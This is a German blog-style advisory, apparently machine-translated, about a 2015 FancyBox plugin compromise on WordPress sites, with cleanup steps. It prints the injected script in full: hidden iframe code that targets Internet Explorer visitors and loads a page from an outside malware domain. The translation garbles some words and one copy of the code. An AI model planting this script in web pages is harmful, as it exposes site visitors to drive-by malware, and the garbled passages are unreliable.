Zu Beginn der Woche eine Reihe von Websites und Blogs mit WordPress, erhielt Warnungen von Malware -Infektion durch Google Webmasters.
Das Problem, bei dem Google Webmasters bezieht sich auf das Vorhandensein von a Kabeljau / Skript Iframe Malware in der Quelle der Webseiten.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Es scheint ein Verwundbarkeit A PluginAcquisFancybox für WordPress Was bis gestern (05.02.2015) lange nicht aktualisiert worden war.
Dieses Problem lösen und Desinfizierung von Virenstellen Mit dieser Malware ist es relativ einfach.
1. Deaktivieren Sie die Plugn Fancybox.
2. Löschen Sie alle Fancybox -Plugin -Dateien auf dem Server (über FTP) (über FTP)
3. Installieren Sie die neue Version des Plugins (Fancybox 3.0.4)
Fancybox für WordPress 3.0.4
– In der in 3.0.3 genannten Einstellung umbenannt, die durch das in 3.0.3 erwähnte Sicherheitsproblem betroffen ist. Dies sollte verhindern, dass der böswillige Code auf Websites erscheint, auf denen das Plugin aktualisiert wird, ohne den böswilligen Code zu entfernen.
Fancybox für WordPress 3.0.3
– Ein Sicherheitsproblem behoben.
Malware Info:
Typ: Iframe -Umleitung
Ziel: WordPress FancyBox
Malware -Domäne: 203Koko.eu
Malware URI: http://203koko.eu/hjnfh/ipframe2.php
Malware -Rohcode: <iframe src =”http://203koko.eu/hjnfh/ipframe2.php” Breite =”20″ Höhe =”30″ ></iframe>
Malware -Skript: <Skript>if (navigator.useragent.match (/msie/i)) {document.write (‘ <Div -Stil =”Position: absolut; links: -2000px; Breite: 2000px”>
Entfernen Sie Malware von Ihrer WordPress -Website.